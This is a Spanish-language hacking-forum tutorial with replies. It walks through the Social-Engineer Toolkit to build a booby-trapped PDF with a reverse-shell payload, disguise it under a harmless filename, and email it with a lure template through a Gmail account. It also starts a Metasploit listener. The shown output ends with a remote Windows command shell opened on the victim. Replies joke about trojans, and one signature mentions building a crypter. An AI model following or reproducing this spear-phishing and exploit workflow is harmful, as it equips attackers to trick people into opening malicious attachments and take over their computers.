Bueno social engineering toolkit set es una herramienta para automotizar la ingenieria social como penteste empezemos ?

Instalacion

Código: Seleccionar todo

svn co http://svn.thepentest.com/social_engineering_tooltik/ SET/


una vez que lo instalamos lo ejecutamos

Código: Seleccionar todo

root@linuxfer-desktop:/home/linuxfer/SET# ./set

           d888888o.   8 8888888888 8888888 8888888888
         .'8888:' '88. 8 8888             8 8888
         8.'8888.   Y8 8 8888             8 8888
         '8.'8888.     8 8888             8 8888
          '8.'8888.    8 888888888888     8 8888
           '8.'8888.   8 8888             8 8888
            '8.'8888.  8 8888             8 8888
        8b   '8.'8888. 8 8888             8 8888
        '8b.  ;8.'8888 8 8888             8 8888
         'Y8888P ,88P' 8 888888888888     8 8888

  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]        Written by David Kennedy (ReL1K)          [---]
  [---]                 Version: 0.5                     [---]
  [---]         Codename: 'Return of the Lemon'          [---]
  [---]     Report bugs to: [email protected]    [---]
  [---]       Homepage: http://www.secmaniac.com         [---]
  [---]     Framework: http://www.social-engineer.org    [---]
  [---]      Unpublished Java Applet by: Thomas Werth    [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

Select from the menu on what you would like to do:

1. Spear-Phishing Attack Vectors
2. Website Attack Vectors
3. Infectious USB/CD/DVD Generator
4. Update the Metasploit Framework
5. Update the Social-Engineer Toolkit
6. Create a Payload and Listener
7. Mass Mailer Attack
8. Help, Credits, and About
9. Exit the Social-Engineer Toolkit

Enter your choice:


voy a explicar una funcion de esta tool lo demas se lo dejo a ustedes ;D

elegimos

1. Spear-Phishing Attack Vectors



Código: Seleccionar todo

Enter your choice: 1

Welcome to the SET E-Mail attack method. This module allows you
to specially craft email messages and send them to a large (or small)
number of people with attached fileformat malicious payloads. If you
want to spoof your email address, be sure "Sendmail" is installed (it
is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
to SENDMAIL=ON.

There are two options, one is getting your feet wet and letting SET do
everything for you (option 1), the second is to create your own FileFormat
payload and use it in your own attack. Either way, good luck and enjoy!

1. Perform a Mass Email Attack
2. Create a FileFormat Payload
3. Create a Social-Engineering Template
4. Return to Main Menu

Enter your choice:


traduccion

Bienvenido al método de ataque conjunto E-Mail. Este módulo le permite
especialmente a las embarcaciones de mensajes de correo electrónico y enviarlos a un grande (o pequeño)
número de personas con formato de archivo adjunto malicioso cargas útiles. Si usted
quiere suplantar su dirección de correo electrónico, asegúrese de "Sendmail" está instalado (es
se instala en BT4) y cambiar la config / set_config SENDMAIL = OFF pabellón
a sendmail = ON.

Hay dos opciones, una es mojarse los pies y dejando hacer AJUSTE
todo por ti (opción 1), el segundo es para crear su propio FileFormat
carga útil y utilizarlo en su propio ataque. De cualquier forma, buena suerte y diviértete!



yo voy a elegir mojarme las pies (?

bueno tipeamos 1

Código: Seleccionar todo

Enter your choice: 1

Select the file format exploit you want.
The default is the PDF embedded EXE.

        ********** PAYLOADS **********

1. Adobe Flash Player 'newfunction' Invalid Pointer Use
2. Adobe Collab.collectEmailInfo Buffer Overflow
3. Adobe Collab.getIcon Buffer Overflow
4. Adobe JBIG2Decode Memory Corruption Exploit
5. Adobe PDF Embedded EXE Social Engineering
6. Adobe util.printf() Buffer Overflow
7. Custom EXE to VBA (sent via RAR) (RAR required)
8. Adobe U3D CLODProgressiveMeshDeclaration Array Overrun

Enter the number you want (press enter for default):


aca elegimos el payload que ustedes quieran yo elegio el 4

Código: Seleccionar todo

Enter the number you want (press enter for default): 4

1. Windows Reverse TCP Shell
2. Windows Meterpreter Reverse_TCP
3. Windows Reverse VNC
4. Windows Reverse TCP Shell (x64)
5. Windows Meterpreter Reverse_TCP (X64)
6. Windows Shell Bind_TCP (X64)

Enter the payload you want (press enter for default):


metodo de coneccion

reverse: la pc remota se conecta a nosotros

bind: nosotros nos conectamos a la pc remota

yo elegi la 1

Código: Seleccionar todo

Enter the payload you want (press enter for default): 1

Código: Seleccionar todo

Enter the port to connect back on (press enter for default):4444


bueno aca elegimos el puerto ustedes elegin el que quieran :P

Código: Seleccionar todo

[*] Generating fileformat exploit...
[*] Please wait while we load the module tree...
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Creating 'template.pdf' file...
[*] Generated output file /home/linuxfer/SET/src/program_junk/template.pdf

[*] Payload creation complete.
[*] All payloads get sent to the src/msf_attacks/template.pdf directory
[*] Payload generation complete. Press enter to continue.


As an added bonus, use the file-format creator in SET to create your attachment.

Right now the attachment will be imported with filename of 'template.whatever'

Do you want to rename the file?

example Enter the new filename: moo.pdf

1. Keep the filename, I don't care.
2. Rename the file, I want to be cool.

Enter your choice (enter for default):


bueno aca nos pregunta si queremos renombrar el archivo pdf yo lo voy a renombrar

Código: Seleccionar todo

Enter your choice (enter for default): 2
Enter the new filename: durazninpaquero.pdf
Filename changed, moving on...

Social Engineer Toolkit Mass E-Mailer

There are two options on the mass e-mailer, the first would
be to send an email to one individual person. The second option
will allow you to import a list and send it to as many people as
you want within that list.

What do you want to do:

1. E-Mail Attack Single Email Address
2. E-Mail Attack Mass Mailer
3. Return to main menu.

Enter your choice:


aca nos pregunta si queremos enviar el mail a uno solo o a varios :P

yo voy a elegir a uno

Código: Seleccionar todo

Enter your choice: 1

Do you want to use a predefined template or craft
a one time email template.

1. Pre-Defined Template
2. One-Time Use Email Template

Enter your choice:

aca nos pregunta si queremos un mensaje pre definido o un mensaje personalizado osea hecho por nosotros yo voy a elegir uno pre difinido XD

tipeamos 1

Código: Seleccionar todo

Enter your choice: 1
Below is a list of available templates:

1: Computer Issue
2: Dan Brown's Angels & Demons
3: Baby Pics
4: New Update
5: LOL...have to check this out...
6: Status Report
7: Strange internet usage from your computer

Enter the number you want to use:

aca elegimos el mensaje yo voy a elegir el 5

Código: Seleccionar todo

Enter the number you want to use: 5

Enter who you want to send email to: [email protected]

What option do you want to use?

1. Use a GMAIL Account for your email attack.
2. Use your own server or open relay

Enter your choice:


aca elegimos con la cuenta que enviamos el mensaje yo voy a enviarmelo a mi mismo ustedes si tiene otra la pueden configurar con la segunda opcion

Código: Seleccionar todo

Enter your choice: 1
Enter your GMAIL email address: [email protected]
Enter your password for gmail (it will not be displayed back to you):
aca ponemos el mail y la pass para que pueda enviar el mail

Código: Seleccionar todo

SET has finished delivering the emails.

Do you want to setup a listener yes or no: yes



aca nos pregunta si queremos poner metasploit en modo detector osea para poder conectar la shell le ponemos que si

[code]                _                  _       _ _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ' _ \ / _ \ __/ _' / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ msf v3.3-dev
+ -- --=[ 379 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 155 aux

resource> use exploit/multi/handler
resource> set PAYLOAD windows/shell_reverse_tcp
PAYLOAD => windows/shell_reverse_tcp
resource> set LHOST 192.168.171.128
LHOST => 192.168.171.128
resource> set LPORT 4444
LPORT => 4444
resource> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource> set ExitOnSession false
ExitOnSession => false
resource> exploit -j
[*] Exploit running as background job.
msf exploit(handler) >
[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...




como ven llego el mail ahora lo la pc remota lo tendria que abrir y ...

Código: Seleccionar todo

[*] Please wait while we load the module tree...
[*] handler bindig to LHOST 0.0.0.0
[*] Started reverse handler
[*] Starting the payload handler...
[*] command shell session 1 opened (10.232.23.432:4444 -> 192.168.171.128:4444)

 Microsoft Windows [Version 5.2.3790]
  (C) Copyright 1985-2003 Microsoft Corp.

C:\Documents and Settings\Prueba\Escritorio>

game over (? bueno ahi esta una funcion de esta tools las demas como clonar una web o hacer una web falsa con un payload de metasploit no las hago ahora porque me da paja otro dia las voy hacer espero que les halla gustado y saludos a ReactOS , duraznin, oxono ,mastervip y los demas

hasta la proxima ;D
Imagen
polifemo escribió: esto es un bruto troyano...
darker...Vos crees que nosotros nacimos ayer?
Que pedazo de boludo....
Hola, alguien me puede explicar como lo bajo y como lo instalo?
Lo que sabemos es una gota de agua; lo que ignoramos es el océano.
Matemático y físico británico.

Proceso de creación de crypter... 70%
Responder

Volver a “General”